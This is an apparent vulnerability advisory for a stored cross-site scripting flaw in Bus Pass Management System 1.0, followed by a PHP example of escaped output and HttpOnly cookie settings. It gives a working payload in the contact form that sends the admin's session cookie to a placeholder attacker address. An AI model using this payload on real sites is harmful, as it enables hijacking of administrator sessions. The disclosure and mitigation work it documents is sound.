Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Vulnerability / Exploit
Discovered: 2023-04-05 | Type: webapps | Platform: php
This exploit / vulnerability (Bus Pass Management System 1.0 stored cross-site scripting) is for educational purposes only; if you use it, you do so at your own risk!
# Description
The application lets a visitor send a message to the admin from the "Contact" section. If an XSS payload is placed in the title or message field (and possibly in the email field, by bypassing the client-side validation), the payload is stored and executes when the admin opens the message to read it.
# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "viewid" value to match the number of the message)
- From /contact.php, send a message containing the following payload in "title" or "message" fields:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first URL has to point to an existing image)
- Log in with admin credentials, go to /admin/unreadenq.php and click "view" next to the new message to execute the payload. After the first view, the payload can be triggered again from /admin/readenq.php.
- Your listener will receive the PHP session ID.
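The root cause is that the stored enquiry fields are echoed into the admin page without output encoding. The following PHP is an added example written for this advisory, not code from the Bus Pass Management System project: it shows the vulnerable rendering pattern next to a hardened version, plus the HttpOnly session-cookie setting that stops `document.cookie` from exposing the session ID even if a script does run. The field names title, email and message come from the advisory; the table name and the row layout are assumptions.

```php
<?php
// Added example, not the project's own code. Column names and the
// sample row are assumptions; the vulnerable page is /admin/view-enquiry.php.

// Mitigation 1: keep the PHP session cookie out of reach of JavaScript.
// These must be set before session_start() to take effect.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_samesite', 'Strict');
session_start();

// Mitigation 2: encode every stored value for the HTML context it lands in.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (what the advisory describes): the stored message is
// echoed raw, so an <img ... onload=...> tag in title/message becomes live
// markup in the admin's browser.
function render_enquiry_vulnerable(array $row): string
{
    return "<h3>{$row['title']}</h3><p>{$row['email']}</p><p>{$row['message']}</p>";
}

// Hardened pattern: the same tag is rendered as inert text.
function render_enquiry_safe(array $row): string
{
    return '<h3>' . e($row['title']) . '</h3>'
         . '<p>'  . e($row['email']) . '</p>'
         . '<p>'  . e($row['message']) . '</p>';
}

// Constructed sample row standing in for
// SELECT title, email, message FROM tblenquiry WHERE id = ?  (table name assumed).
$row = [
    'title'   => '<img src=x onload=alert(1)>',
    'email'   => 'user@example.test',
    'message' => 'Hello, when does the next pass batch open?',
];

// The vulnerable renderer returns the tag verbatim; the safe renderer
// returns it with < > and quotes replaced by HTML entities.
echo render_enquiry_safe($row), PHP_EOL;
```

Output encoding alone prevents the script from running; HttpOnly is a second layer that limits the damage if another injection point is found.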